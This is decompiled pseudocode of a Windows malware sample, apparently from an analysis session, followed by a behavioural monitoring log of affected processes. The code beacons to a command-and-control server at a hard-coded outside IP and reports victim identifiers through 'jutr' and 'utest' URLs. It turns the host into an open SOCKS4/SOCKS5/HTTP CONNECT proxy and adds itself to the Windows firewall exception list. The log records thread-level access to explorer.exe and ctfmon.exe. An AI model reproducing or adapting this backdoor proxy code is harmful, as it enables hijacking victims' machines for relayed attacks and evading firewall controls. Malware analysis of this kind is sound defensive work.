CHAR String1; // [sp+45Ch] [bp-2170h]@1
char v30; // [sp+45Dh] [bp-216Fh]@1
__int16 v31; // [sp+4A9h] [bp-2123h]@1
char v32; // [sp+4ABh] [bp-2121h]@1
char cp; // [sp+408h] [bp-21C4h]@1
char v34; // [sp+409h] [bp-21C3h]@1
__int16 v35; // [sp+455h] [bp-2177h]@1
char v36; // [sp+457h] [bp-2175h]@1
signed int v37; // [sp+458h] [bp-2174h]@1
LPVOID v38; // [sp+4h] [bp-25C8h]@1
signed int v39; // [sp+5B4h] [bp-2018h]@1
signed int v40; // [sp+5B0h] [bp-201Ch]@1
int v41; // [sp+25C4h] [bp-8h]@1
int v42; // [sp+25C0h] [bp-Ch]@1
int v43; // [sp+5BCh] [bp-2010h]@1
int v44; // [sp+5B8h] [bp-2014h]@1
unsigned int v45; // [sp+25C8h] [bp-4h]@1
char v46; // [sp+4ACh] [bp-2120h]@5
char v47; // [sp+4ADh] [bp-211Fh]@5
char v48; // [sp+5ADh] [bp-201Fh]@5
String2 = 0;
memset(&v22, 0, 0x1FFCu);
v23 = 0;
v24 = 0;
String = 0;
memset(&v26, 0, 0x3FCu);
v27 = 0;
v28 = 0;
String1 = 0;
memset(&v30, 0, 0x4Cu);
v31 = 0;
v32 = 0;
cp = 0;
memset(&v34, 0, 0x4Cu);
v35 = 0;
v36 = 0;
v37 = 0;
v38 = a1;
v39 = 0;
v40 = 0;
v41 = 195;
v42 = 24;
v43 = 77;
v44 = 224;
v45 = 0;
if ( (unsigned __int16)sub_40101A() % 10000 > 5000 )
{
v41 = 212;
v42 = 117;
v43 = 163;
v44 = 35;
}
if ( GetPrivateProfileStringA("MDIRTE32", "ss", 0, &String2, 0x80u, "SYSTEM.INI") )
{
v41 = 89;
v42 = 149;
v43 = 227;
v44 = 194;
}
v46 = 0;
memset(&v47, 0, 0x100u);
v48 = 0;
lstrcpyA(&String1, "http://");
v1 = sub_4010C6(v41);
lstrcatA(&String1, v1);
lstrcatA(&String1, L".");
v2 = sub_4010C6(v42);
lstrcatA(&String1, v2);
lstrcatA(&String1, L".");
v3 = sub_4010C6(v43);
lstrcatA(&String1, v3);
lstrcatA(&String1, L".");
v4 = sub_4010C6(v44);
lstrcatA(&String1, v4);
lstrcatA(&String1, L"/");
while ( 1 )
{
if ( !String1 || !(v45 % 2) )
{
v5 = GetTickCount();
wsprintfA(&String, "http://72.232.11.26/?%x", v5);
v37 = sub_401890((int)&String, &String2, 0x2000u, 0);
v6 = lstrlenA(&unk_405450);
sub_401544((int)&unk_405460, v6, (int)&v46);
sub_40161D((int)&String2, 4096, (int)&v46);
*(&String2 + v37) = 0;
if ( sub_401044((int)&String2, (int)"manna") )
lstrcpyA(&String1, &String2);
else
lstrcpyA(&String1, "Access ALL");
}
if ( !(v37 % 5) || !cp )
{
v37 = 0;
lstrcpyA(&String, "http://72.232.11.26/i.php");
sub_401890((int)&String, &String2, 0xC00u, 1);
if ( sub_401107((int)&String2) )
{
lstrcpyA(&cp, &String2);
lstrcpyA(byte_406588, &String2);
}
}
if ( sub_401107((int)&cp) )
v37 = sub_401355(&cp);
if ( sub_40126C() )
v39 = 2;
else
v39 = 1;
v40 = 0;
if ( v39 == 1 )
{
dword_405584 = 1;
lstrcpyA(&String, "http://");
v7 = sub_4010C6(89);
lstrcatA(&String, v7);
lstrcatA(&String, L".");
v8 = sub_4010C6(149);
lstrcatA(&String, v8);
lstrcatA(&String, L".");
v9 = sub_4010C6(227);
lstrcatA(&String, v9);
lstrcatA(&String, L".");
v10 = sub_4010C6(194);
lstrcatA(&String, v10);
lstrcatA(&String, L"/");
v11 = v37;
v12 = 7 * GetTickCount();
v13 = GetTickCount();
v14 = v39;
v15 = lstrlenA(&String);
wsprintfA(&String + v15, "jutr/?jutr=%d&oo=%d&%x=%x&ra=%d", 7 * (_DWORD)v38, v14, v13, v12, v11);
sub_401890((int)&String, &String2, 0xC00u, 1);
if ( sub_401044((int)&String2, (int)"hello") )
v40 = 1;
}
else
{
dword_405584 = 0;
}
lstrcpyA(&String, &String1);
v16 = v37;
v17 = 7 * GetTickCount();
v18 = GetTickCount();
v19 = v39;
v20 = lstrlenA(&String);
wsprintfA(&String + v20, "utest/?jutr=%d&oo=%d&%x=%x&ra=%d", 7 * (_DWORD)v38, v19, v18, v17, v16);
sub_401890((int)&String, &String2, 0xC00u, 1);
if ( sub_401044((int)&String2, (int)"hello") || v40 )
Sleep(0x2DC6C0u);
Sleep(0x57E40u);
++v45;
}
}
//----- (004020A4) --------------------------------------------------------
int __cdecl sub_4020A4()
{
struct hostent *v1; // eax@1
char name; // [sp+8h] [bp-100h]@1
char v3; // [sp+9h] [bp-FFh]@1
__int16 v4; // [sp+105h] [bp-3h]@1
char v5; // [sp+107h] [bp-1h]@1
struct hostent *v6; // [sp+4h] [bp-104h]@1
name = 0;
memset(&v3, 0, 0xFCu);
v4 = 0;
v5 = 0;
gethostname(&name, 256);
v1 = gethostbyname(&name);
v6 = v1;
return **(_DWORD **)v1->h_addr_list;
}
//----- (004020FE) --------------------------------------------------------
void __stdcall sub_4020FE(LPVOID a1)
{
int v1; // eax@3
char *v2; // eax@29
char *v3; // eax@43
int v4; // eax@50
int v5; // eax@69
char *v6; // eax@77
signed int v7; // eax@92
SOCKET v8; // eax@98
SOCKET v9; // eax@106
int v10; // eax@114
int v11; // eax@120
int v12; // eax@125
SOCKET v13; // eax@131
int v14; // eax@133
int v15; // eax@154
char *v16; // eax@160
struct hostent *v17; // eax@162
SOCKET v18; // eax@165
int v19; // eax@169
int v20; // eax@173
int v21; // eax@176
int v22; // eax@197
int v23; // eax@200
int v24; // eax@204
int v25; // eax@207
SOCKET v26; // [sp+33F8h] [bp-101Ch]@1
SOCKET s; // [sp+4410h] [bp-4h]@1
SOCKET v28; // [sp+33FCh] [bp-1018h]@1
SOCKET fd; // [sp+33ECh] [bp-1028h]@1
int hostshort; // [sp+12D8h] [bp-313Ch]@1
unsigned __int32 v31; // [sp+33F0h] [bp-1024h]@1
struct sockaddr name; // [sp+4400h] [bp-14h]@1
__int16 v33; // [sp+11B8h] [bp-325Ch]@1
int v34; // [sp+11BAh] [bp-325Ah]@1
int v35; // [sp+11BEh] [bp-3256h]@1
int v36; // [sp+11C2h] [bp-3252h]@1
__int16 v37; // [sp+11C6h] [bp-324Eh]@1
struct sockaddr addr; // [sp+19Ch] [bp-4278h]@1
__int16 Dst; // [sp+11C8h] [bp-324Ch]@1
struct in_addr in; // [sp+11CAh] [bp-324Ah]@1
int v41; // [sp+11CEh] [bp-3246h]@1
int v42; // [sp+11D2h] [bp-3242h]@1
__int16 v43; // [sp+11D6h] [bp-323Eh]@1
int v44; // [sp+33F4h] [bp-1020h]@1
int len; // [sp+22DCh] [bp-2138h]@1
int v46; // [sp+11B0h] [bp-3264h]@1
int v47; // [sp+1ACh] [bp-4268h]@1
int v48; // [sp+33E4h] [bp-1030h]@1
signed int v49; // [sp+33E8h] [bp-102Ch]@1
int namelen; // [sp+11B4h] [bp-3260h]@1
int Buf1; // [sp+23E4h] [bp-2030h]@1
__int16 v52; // [sp+33E1h] [bp-1033h]@1
char v53; // [sp+33E3h] [bp-1031h]@1
char buf; // [sp+12DCh] [bp-3138h]@1
char v55; // [sp+12DDh] [bp-3137h]@1
__int16 v56; // [sp+22D9h] [bp-213Bh]@1
char v57; // [sp+22DBh] [bp-2139h]@1
char v58; // [sp+1B0h] [bp-4264h]@1
char v59; // [sp+1B1h] [bp-4263h]@1
__int16 v60; // [sp+11ADh] [bp-3267h]@1
char v61; // [sp+11AFh] [bp-3265h]@1
char v62; // [sp+3400h] [bp-1014h]@1
char v63; // [sp+3401h] [bp-1013h]@1
__int16 v64; // [sp+43FDh] [bp-17h]@1
char v65; // [sp+43FFh] [bp-15h]@1
char cp; // [sp+22E0h] [bp-2134h]@1
char v67; // [sp+22E1h] [bp-2133h]@1
CHAR String1; // [sp+11D8h] [bp-323Ch]@1
char v69; // [sp+11D9h] [bp-323Bh]@1
__int16 v70; // [sp+12D5h] [bp-313Fh]@1
char v71; // [sp+12D7h] [bp-313Dh]@1
int v72; // [sp+194h] [bp-4280h]@3
int v73; // [sp+198h] [bp-427Ch]@6
signed int v74; // [sp+190h] [bp-4284h]@36
u_short Src; // [sp+23ECh] [bp-2028h]@43
_BYTE v76[4]; // [sp+22D8h] [bp-213Ch]@43
char *v77; // [sp+18Ch] [bp-4288h]@43
int v78; // [sp+188h] [bp-428Ch]@50
struct in_addr netshort; // [sp+23E8h] [bp-202Ch]@61
int v80; // [sp+184h] [bp-4290h]@69
signed int v81; // [sp+180h] [bp-4294h]@84
signed int v82; // [sp+17Ch] [bp-4298h]@96
signed int v83; // [sp+178h] [bp-429Ch]@102
signed int v84; // [sp+174h] [bp-42A0h]@108
int v85; // [sp+4h] [bp-4410h]@109
int v86; // [sp+170h] [bp-42A4h]@114
char v87; // [sp+12DEh] [bp-3136h]@120
char v88; // [sp+12DFh] [bp-3135h]@120
int v89; // [sp+12E0h] [bp-3134h]@120
__int16 v90; // [sp+12E4h] [bp-3130h]@120
int v91; // [sp+16Ch] [bp-42A8h]@120
int v92; // [sp+168h] [bp-42ACh]@125
int addrlen; // [sp+164h] [bp-42B0h]@131
int v94; // [sp+160h] [bp-42B4h]@133
int v95; // [sp+40h] [bp-43D4h]@136
signed int v96; // [sp+44h] [bp-43D0h]@136
fd_set readfds; // [sp+58h] [bp-43BCh]@136
int fromlen; // [sp+15Ch] [bp-42B8h]@136
u_int v99; // [sp+3Ch] [bp-43D8h]@137
u_int v100; // [sp+38h] [bp-43DCh]@145
struct sockaddr from; // [sp+48h] [bp-43CCh]@154
int v102; // [sp+2Ch] [bp-43E8h]@154
int v103; // [sp+34h] [bp-43E0h]@160
struct hostent *v104; // [sp+28h] [bp-43ECh]@162
int v105; // [sp+30h] [bp-43E4h]@169
size_t Size; // [sp+20h] [bp-43F4h]@173
char v107; // [sp+1BAh] [bp-425Ah]@176
char v108; // [sp+1B2h] [bp-4262h]@176
char v109; // [sp+1B3h] [bp-4261h]@176
int v110; // [sp+1B4h] [bp-4260h]@176
__int16 v111; // [sp+1B8h] [bp-425Ch]@176
int v112; // [sp+24h] [bp-43F0h]@176
u_int v113; // [sp+1Ch] [bp-43F8h]@180
u_int v114; // [sp+18h] [bp-43FCh]@188
int v115; // [sp+10h] [bp-4404h]@197
int v116; // [sp+14h] [bp-4400h]@200
int v117; // [sp+8h] [bp-440Ch]@204
int v118; // [sp+Ch] [bp-4408h]@207
v26 = -1;
s = (SOCKET)a1;
v28 = -1;
fd = -1;
hostshort = 0;
v31 = 0;
name.sa_family = 0;
*(_DWORD *)&name.sa_data[0] = 0;
*(_DWORD *)&name.sa_data[4] = 0;
*(_DWORD *)&name.sa_data[8] = 0;
*(_WORD *)&name.sa_data[12] = 0;
v33 = 0;
v34 = 0;
v35 = 0;
v36 = 0;
v37 = 0;
addr.sa_family = 0;
*(_DWORD *)&addr.sa_data[0] = 0;
*(_DWORD *)&addr.sa_data[4] = 0;
*(_DWORD *)&addr.sa_data[8] = 0;
*(_WORD *)&addr.sa_data[12] = 0;
Dst = 0;
in = 0;
v41 = 0;
v42 = 0;
v43 = 0;
v44 = 0;
len = 0;
v46 = 0;
v47 = 0;
v48 = 0;
v49 = 0;
namelen = 0;
LOBYTE(Buf1) = 0;
memset((char *)&Buf1 + 1, 0, 0xFFCu);
v52 = 0;
v53 = 0;
buf = 0;
memset(&v55, 0, 0xFFCu);
v56 = 0;
v57 = 0;
v58 = 0;
memset(&v59, 0, 0xFFCu);
v60 = 0;
v61 = 0;
v62 = 0;
memset(&v63, 0, 0xFFCu);
v64 = 0;
v65 = 0;
cp = 0;
memset(&v67, 0, 0x100u);
String1 = 0;
memset(&v69, 0, 0xFCu);
v70 = 0;
v71 = 0;
while ( 1 )
{
if ( v48 )
goto LABEL_28;
v1 = recv(s, (char *)&Buf1 + v44, 4095 - v44, 0);
v72 = v1;
if ( v1 == -1 || !v72 )
goto LABEL_211;
v44 += v72;
v73 = 0;
while ( 1 )
{
if ( v73 >= v44 )
goto LABEL_15;
if ( v73 + 1 < v44 && *(_WORD *)((char *)&Buf1 + v73) == 2570 )
break;
if ( v73 + 3 < v44 && *(int *)((char *)&Buf1 + v73) == 168626701 )
{
v49 = 100;
v48 = v73 + 4;
goto LABEL_15;
}
++v73;
}
v49 = 100;
v48 = v73 + 2;
LABEL_15:
if ( v44 >= 3 )
{
if ( (char)Buf1 == 4 )
break;
}
if ( v44 >= 3 && (char)Buf1 == 5 && v44 == SBYTE1(Buf1) + 2 )
{
v49 = 500;
v48 = SBYTE1(Buf1) + 2;
goto LABEL_28;
}
}
if ( v44 < 9 )
{
while ( v44 < 9 )
v44 += recv(s, (char *)&Buf1 + v44, 4095 - v44, 0);
}
if ( SBYTE1(Buf1) == 1 )
v49 = 1024;
LABEL_28:
namelen = 16;
memset(&Dst, 0, 0x10u);
if ( !getpeername(s, (struct sockaddr *)&Dst, &namelen) )
{
v2 = inet_ntoa(*(struct in_addr *)&in.S_un.S_un_b.s_b3);
lstrcpyA(&String1, v2);
}
if ( sub_401044((int)&String1, (int)"Access ALL") || sub_401044((int)&String1, (int)&String1) )
{
cp = 0;
if ( v49 == 100 )
{
if ( v48 >= 32 )
{
if ( !memcmp(&Buf1, "CONNECT ", 8u) )
{
v74 = 8;
while ( v74 < v48 && *((_BYTE *)&Buf1 + v74) != 32 )
++v74;
if ( *((_BYTE *)&Buf1 + v74) == 32 )
{
if ( v74 - 8 < 256 )
{
memcpy(&cp, &Src, v74 - 8);
v76[v74] = 0;
v3 = strchr(&cp, 58);
v77 = v3;
if ( v3 )
{
hostshort = atoi(v77 + 1);
*v77 = 0;
if ( !hostshort || (unsigned int)hostshort >= 0x10000 )
cp = 0;
}
}
}
}
}
if ( !cp )
{
*((_BYTE *)&Buf1 + v44) = 0;
goto LABEL_211;
}
}
if ( v49 == 500 )
{
v44 = 0;
len = 2;
buf = 5;
v55 = 0;
v4 = send(s, &buf, 2, 0);
v78 = v4;
if ( v4 == -1 || !v78 )
goto LABEL_211;
v48 = 0;
while ( 1 )
{
if ( v48 )
goto LABEL_73;
if ( v44 >= 8
&& (SBYTE3(Buf1) == 1 && v44 >= 10
|| SBYTE3(Buf1) == 4 && v44 >= 22
|| SBYTE3(Buf1) == 3 && v44 >= (char)netshort.S_un.S_un_b.s_b1 + 7) )
break;
v5 = recv(s, (char *)&Buf1 + v44, 4095 - v44, 0);
v80 = v5;
if ( v5 == -1 || !v80 )
goto LABEL_211;
v44 += v80;
}
v49 = SBYTE1(Buf1);
if ( SBYTE3(Buf1) == 1 )
v48 = 10;
if ( SBYTE3(Buf1) == 4 )
v48 = 22;
if ( SBYTE3(Buf1) == 3 )
v48 = (char)netshort.S_un.S_un_b.s_b1 + 7;
LABEL_73:
if ( SBYTE3(Buf1) != 1 )
{
if ( SBYTE3(Buf1) != 3 )
goto LABEL_211;
}
if ( SBYTE3(Buf1) == 1 )
{
v6 = inet_ntoa(netshort);
lstrcpyA(&cp, v6);
LOWORD(hostshort) = ntohs(Src);
hostshort = (unsigned __int16)hostshort;
}
if ( SBYTE3(Buf1) == 3 )
{
memcpy(&cp, &netshort.S_un.S_un_b.s_b2, (char)netshort.S_un.S_un_b.s_b1);
*(&cp + (char)netshort.S_un.S_un_b.s_b1) = 0;
LOWORD(hostshort) = ntohs(*(_WORD *)(&netshort.S_un.S_un_b.s_b2 + (char)netshort.S_un.S_un_b.s_b1));
hostshort = (unsigned __int16)hostshort;
}
}
v44 = 0;
name.sa_family = 2;
*(_DWORD *)&name.sa_data[2] = 0;
*(_WORD *)&name.sa_data[0] = htons(0);
if ( v49 == 1024 )
{
hostshort = HIWORD(Buf1);
if ( (char)netshort.S_un.S_un_b.s_b1 || (char)netshort.S_un.S_un_b.s_b2 || (char)netshort.S_un.S_un_b.s_b3 )
{
v31 = (unsigned __int32)netshort;
}
else
{
v81 = 7;
while ( *((_BYTE *)&Buf1 + v81) )
++v81;
v31 = sub_40116C((char *)&Buf1 + v81 + 1);
}
}
else
{
v31 = sub_40116C(&cp);
}
if ( v49 == 3 )
{
v7 = socket(2, 2, 0);
fd = v7;
if ( v7 == -1 || bind(fd, &name, 16) )
goto LABEL_211;
v82 = 16;
getsockname(fd, &name, &v82);
}
if ( v49 == 2 )
{
v8 = socket(2, 1, 0);
v28 = v8;
if ( v8 == -1 || bind(v28, &name, 16) )
goto LABEL_211;
v83 = 16;
getsockname(v28, &name, &v83);
}
if ( v49 != 1 && v49 != 1024 && v49 != 100
|| (v9 = socket(2, 1, 0), v26 = v9, v9 != -1)
&& ((v84 = 16, getsockname(v26, &name, &v84), v33 = 2, *(int *)((char *)&v34 + 2) = v31, v49 != 1024) ? (LOWORD(v85) = htons(hostshort), v85 = (unsigned __int16)v85) : (v85 = hostshort), LOWORD(v34) = v85, connect(v26, (const struct sockaddr *)&v33, 16) != -1) )
{
if ( v49 == 100 )
{
memcpy(&buf, "HTTP/1.0 200 OK\r\n", 0x11u);
len = 17;
v10 = send(s, &buf, 17, 0);
v86 = v10;
if ( v10 == -1 || !v86 )
goto LABEL_211;
}
else
{
if ( v49 != 1 && v49 != 2 )
{
if ( v49 == 1024 )
{
len = 8;
buf = 0;
v55 = 90;
v87 = 0;
v88 = 1;
v12 = send(s, &buf, 8, 0);
v92 = v12;
if ( v12 == -1 || !v92 )
goto LABEL_211;
}
}
else
{
len = 10;
buf = 5;
v55 = 0;
v87 = 0;
v88 = 1;
v89 = sub_4020A4();
v90 = *(_WORD *)&name.sa_data[0];
v11 = send(s, &buf, len, 0);
v91 = v11;
if ( v11 == -1 || !v91 )
goto LABEL_211;
}
}
if ( v49 != 2
|| !listen(v28, 10)
&& (addrlen = 16, v13 = accept(v28, &addr, &addrlen), v26 = v13, v13 != -1)
&& (closesocket(v28), v28 = -1, len = 10, buf = 5, v55 = 0, v87 = 0, v88 = 1, v89 = *(_DWORD *)&addr.sa_data[2], v90 = *(_WORD *)&addr.sa_data[0], v14 = send(s, &buf, 10, 0), v94 = v14, v14 != -1)
&& v94 )
{
while ( 1 )
{
while ( 1 )
{
v95 = 0;
v96 = 100;
readfds.fd_count = 0;
fromlen = 16;
if ( v49 == 3 )
break;
v113 = 0;
while ( v113 < readfds.fd_count && readfds.fd_array[v113] != s )
++v113;
if ( v113 == readfds.fd_count )
{
if ( (_DWORD)readfds.fd_count < 0x40u )
{
readfds.fd_array[v113] = s;
++readfds.fd_count;
}
}
v114 = 0;
while ( v114 < readfds.fd_count && readfds.fd_array[v114] != v26 )
++v114;
if ( v114 == readfds.fd_count )
{
if ( (_DWORD)readfds.fd_count < 0x40u )
{
readfds.fd_array[v114] = v26;
++readfds.fd_count;
}
}
select(0, &readfds, 0, 0, 0);
if ( !_WSAFDIsSet(v26, &readfds)
|| (v22 = recv(v26, &v58, 4096, 0), v115 = v22, v22 != -1)
&& v115
&& (v23 = send(s, &v58, v115, 0), v116 = v23, v23 != -1)
&& v116 )
{
if ( !_WSAFDIsSet(s, &readfds) )
continue;
v24 = recv(s, (char *)&Buf1, 4096, 0);
v117 = v24;
if ( v24 != -1 )
{
if ( v117 )
{
v25 = send(v26, (const char *)&Buf1, v117, 0);
v118 = v25;
if ( v25 != -1 )
{
if ( v118 )
continue;
}
}
}
}
goto LABEL_211;
}
v99 = 0;
while ( v99 < readfds.fd_count && readfds.fd_array[v99] != fd )
++v99;
if ( v99 == readfds.fd_count )
{
if ( (_DWORD)readfds.fd_count < 0x40u )
{
readfds.fd_array[v99] = fd;
++readfds.fd_count;
}
}
v100 = 0;
while ( v100 < readfds.fd_count && readfds.fd_array[v100] != v26 )
++v100;
if ( v100 == readfds.fd_count )
{
if ( (_DWORD)readfds.fd_count < 0x40u )
{
readfds.fd_array[v100] = v26;
++readfds.fd_count;
}
}
select(0, &readfds, 0, 0, 0);
if ( _WSAFDIsSet(fd, &readfds) )
{
v15 = recvfrom(fd, (char *)&Buf1, 4096, 0, &from, &fromlen);
v102 = v15;
if ( v15 == -1 )
break;
if ( !v102 || SBYTE3(Buf1) == 4 )
break;
if ( SBYTE3(Buf1) == 1 )
{
v16 = inet_ntoa(netshort);
lstrcpyA(&cp, v16);
LOWORD(hostshort) = ntohs(Src);
hostshort = (unsigned __int16)hostshort;
v31 = inet_addr(&cp);
v103 = 10;
}
if ( SBYTE3(Buf1) == 3 )
{
memcpy(&cp, &netshort.S_un.S_un_b.s_b2, (char)netshort.S_un.S_un_b.s_b1);
*(&cp + (char)netshort.S_un.S_un_b.s_b1) = 0;
LOWORD(hostshort) = ntohs(*(_WORD *)(&netshort.S_un.S_un_b.s_b2 + (char)netshort.S_un.S_un_b.s_b1));
hostshort = (unsigned __int16)hostshort;
v17 = gethostbyname(&cp);
v104 = v17;
if ( !v17 )
break;
v31 = **(_DWORD **)v104->h_addr_list;
v103 = (char)netshort.S_un.S_un_b.s_b1 + 7;
}
v18 = socket(2, 2, 0);
v26 = v18;
if ( v18 == -1 )
break;
v33 = 2;
*(int *)((char *)&v34 + 2) = v31;
LOWORD(v34) = htons(hostshort);
if ( connect(v26, (const struct sockaddr *)&v33, 16) == -1 )
break;
v102 -= v103;
v19 = sendto(v26, (const char *)&Buf1 + v103, v102, 0, 0, 0);
v105 = v19;
if ( v19 == -1 )
break;
if ( !v105 )
break;
}
if ( _WSAFDIsSet(v26, &readfds) )
{
v20 = recvfrom(v26, &v58, 4096, 0, (struct sockaddr *)&v33, &fromlen);
Size = v20;
if ( v20 == -1 )
break;
if ( !Size )
break;
memmove(&v107, &v58, Size);
v58 = 0;
v59 = 0;
v108 = 0;
v109 = 1;
v110 = *(int *)((char *)&v34 + 2);
v111 = v34;
Size += 10;
v21 = sendto(fd, &v58, Size, 0, &from, 16);
v112 = v21;
if ( v21 == -1 )
break;
if ( !v112 )
break;
}
}
}
}
}
LABEL_211:
if ( v26 )
{
if ( v26 != -1 )
closesocket(v26);
}
if ( s )
{
if ( s != -1 )
closesocket(s);
}
if ( v28 )
{
if ( v28 != -1 )
closesocket(v28);
}
ExitThread(0);
}
//----- (004034C2) --------------------------------------------------------
signed int __cdecl sub_4034C2()
{
signed int result; // eax@2
DWORD v1; // eax@5
CHAR ValueName; // [sp+8h] [bp-600h]@1
char v3; // [sp+9h] [bp-5FFh]@1
__int16 v4; // [sp+205h] [bp-403h]@1
char v5; // [sp+207h] [bp-401h]@1
CHAR Data; // [sp+208h] [bp-400h]@1
char v7; // [sp+209h] [bp-3FFh]@1
__int16 v8; // [sp+605h] [bp-3h]@1
char v9; // [sp+607h] [bp-1h]@1
HKEY hKey; // [sp+4h] [bp-604h]@3
ValueName = 0;
memset(&v3, 0, 0x1FCu);
v4 = 0;
v5 = 0;
Data = 0;
memset(&v7, 0, 0x3FCu);
v8 = 0;
v9 = 0;
if ( GetModuleFileNameA(0, &ValueName, 0x200u) )
{
if ( RegOpenKeyA(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",
&hKey) )
{
result = -1;
}
else
{
wsprintfA(&Data, "%s:*:Enabled:ipsec", &ValueName);
v1 = strlen(&Data);
if ( RegSetValueExA(hKey, &ValueName, 0, 1u, (const BYTE *)&Data, v1) )
{
RegCloseKey(hKey);
result = -1;
}
else
{
RegCloseKey(hKey);
result = 0;
}
}
}
else
{
result = -1;
}
return result;
}
//----- (004035B3) --------------------------------------------------------
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
int result; // eax@2
signed int v5; // eax@8
signed __int16 v6; // ax@10
HANDLE v7; // eax@18
SOCKET v8; // eax@19
HANDLE v9; // eax@20
char v10; // [sp+1B4h] [bp-404h]@1
char v11; // [sp+1B5h] [bp-403h]@1
__int16 v12; // [sp+5B1h] [bp-7h]@1
char v13; // [sp+5B3h] [bp-5h]@1
HANDLE hObject; // [sp+19Ch] [bp-41Ch]@1
signed int v15; // [sp+1B0h] [bp-408h]@3
struct WSAData WSAData; // [sp+Ch] [bp-5ACh]@6
SOCKET s; // [sp+5B4h] [bp-4h]@8
int lpParameter; // [sp+8h] [bp-5B0h]@10
struct sockaddr name; // [sp+1A0h] [bp-418h]@14
void *v20; // [sp+4h] [bp-5B4h]@19
v10 = 0;
memset(&v11, 0, 0x3FCu);
v12 = 0;
v13 = 0;
sub_4034C2();
SetErrorMode(2u);
hObject = CreateMutexA(0, 1, "S_SERV_v0.66_Beta_erf");
if ( GetLastError() == 183 )
{
ReleaseMutex(hObject);
CloseHandle(hObject);
result = 0;
}
else
{
v15 = 0;
while ( v15 < 100 )
{
++v15;
sub_40101A();
}
if ( WSAStartup(0x202u, &WSAData) )
{
result = 0;
}
else
{
v5 = socket(2, 1, 6);
s = v5;
if ( v5 == -1 )
{
result = -1;
}
else
{
while ( 1 )
{
do
{
Sleep(0x400u);
v6 = sub_40101A();
lpParameter = (unsigned __int16)v6 % 10000 + 1179;
}
while ( (unsigned __int16)v6 % 10000 == 5486 );
if ( lpParameter != 6666 )
{
if ( lpParameter != 6667 )
{
*(_WORD *)&name.sa_data[0] = htons(lpParameter);
*(_DWORD *)&name.sa_data[2] = 0;
name.sa_family = 2;
if ( !bind(s, &name, 16) )
break;
}
}
}
if ( !listen(s, 2147483647) )
{
v7 = CreateThread(0, 0, (DWORD (__stdcall *)(LPVOID))StartAddress, (LPVOID)lpParameter, 0, 0);
CloseHandle(v7);
while ( 1 )
{
do
{
v8 = accept(s, 0, 0);
v20 = (void *)v8;
}
while ( v8 == -1 );
v9 = CreateThread(0, 0, (DWORD (__stdcall *)(LPVOID))sub_4020FE, v20, 0, 0);
CloseHandle(v9);
}
}
result = 0;
}
}
}
return result;
}
##########################
# Processes explorer.exe
##########################
[[ Sections created ]]
Reputation File Path Access Attributes Base Entrypoint Size Protection Mapped to pid Completion Count
16 \BaseNamedObjects\l8geqpHJTkdns0 query and map write and map read commit not known 0 8000 read write own pid object name exists 1
4 \BaseNamedObjects\KhguTew5 query and map write and map read commit 01750000 0 11000 read write own pid object name exists 1
[[ Mutex Created ]]
Reputation Name Completion Count
14 \BaseNamedObjects\explorer.exeM_2036_ success or wait 1
82 \BaseNamedObjects\Op1mutx9 object name exists 2
[[ Thread Operations ]]
Reputation TID PID EIP Filepath Access Completion Count
972 1620 2036 7C8106F9 C:\WINDOWS\explorer.exe terminate and suspend resume and alert and get context and set context and set information and query information and set token and impersonate and direct impersonation success or wait 1
[[ Keyboard State ]]
Reputation Virtual key code State Count
1629 1 up 12
##########################
# Processes ctfmon.exe
##########################
[[ Sections created ]]
Reputation File Path Access Attributes Base Entrypoint Size Protection Mapped to pid Completion Count
16 \BaseNamedObjects\l8geqpHJTkdns0 query and map write and map read commit not known 0 8000 read write own pid object name exists 1
2 \BaseNamedObjects\KhguTew5 query and map write and map read commit 00BD0000 0 11000 read write own pid object name exists 1
[[ Mutex Created ]]
Reputation Name Completion Count
14 \BaseNamedObjects\ctfmon.exeM_424_ success or wait 1
82 \BaseNamedObjects\Op1mutx9 object name exists 2
[[ Thread Operations ]]
Reputation TID PID EIP Filepath Access Completion Count
80 176 424 7C8106F9 C:\WINDOWS\system32\ctfmon.exe terminate and suspend resume and alert and get context and set context and set information and query information and set token and impersonate and direct impersonation success or wait 1
##########################
# Processes notepad.exe
##########################
[[ Sections Opened ]]
Reputation File Path Access Base Entrypoint Size Mapped to pid Completion Count
6053 \KnownDlls\kernel32.dll map write and map read and map execute 7C800000 7C80B64E F6000 own pid success or wait 1
6 \NLS\NlsSectionUnicode map read 002E0000 0 15DF4 own pid success or wait 1
6 \NLS\NlsSectionLocale map read 00300000 0 40EDC own pid success or wait 1
6 \NLS\NlsSectionSortkey query and map read 00350000 0 40004 own pid success or wait 1
6 \NLS\NlsSectionSortTbls map read 003A0000 0 5A04 own pid success or wait 1
12353 \NLS\NlsSectionSortkey00000409 map read not known not known not known own pid object name not found 2
738 \KnownDlls\comdlg32.dll map write and map read and map execute 763B0000 763B1619 49000 own pid success or wait 1
5198 \KnownDlls\ADVAPI32.dll map write and map read and map execute 77DD0000 77DD710B 9B000 own pid success or wait 1
6093 \KnownDlls\RPCRT4.dll map write and map read and map execute 77E70000 77E7628F 92000 own pid success or wait 1
6092 \KnownDlls\Secur32.dll map write and map read and map execute 77FE0000 77FE2146 11000 own pid success or wait 1
5409 \KnownDlls\msvcrt.dll map write and map read and map execute 77C10000 77C1F2A1 58000 own pid success or wait 1
3952 \KnownDlls\GDI32.dll map write and map read and map execute 77F10000 77F16587 49000 own pid success or wait 1
5002 \KnownDlls\USER32.dll map write and map read and map execute 7E410000 7E41B217 91000 own pid success or wait 1
5016 \KnownDlls\SHLWAPI.dll map write and map read and map execute 77F60000 77F651FB 76000 own pid success or wait 1
3369 \KnownDlls\SHELL32.dll map write and map read and map execute 7C9C0000 7C9E74E6 817000 own pid success or wait 1
414 \KnownDlls\WINSPOOL.DRV map write and map read and map execute not known not known not known own pid object name not found 1
1157 \KnownDlls\ShimEng.dll map write and map read and map execute not known not known not known own pid object name not found 1
2137 \KnownDlls\WINMM.dll map write and map read and map execute not known not known not known own pid object name not found 1
5157 \KnownDlls\ole32.dll map write and map read and map execute 774E0000 774FD0B9 13D000 own pid success or wait 1
4270 \KnownDlls\OLEAUT32.dll map write and map read and map execute 77120000 77121560 8B000 own pid success or wait 1
1158 \KnownDlls\MSACM32.dll map write and map read and map execute not known not known not known own pid object name not found 1
3213 \KnownDlls\VERSION.dll map write and map read and map execute 77C00000 77C01135 8000 own pid success or wait 1
1898 \KnownDlls\USERENV.dll map write and map read and map execute 769C0000 769C15E4 B4000 own pid success or wait 1
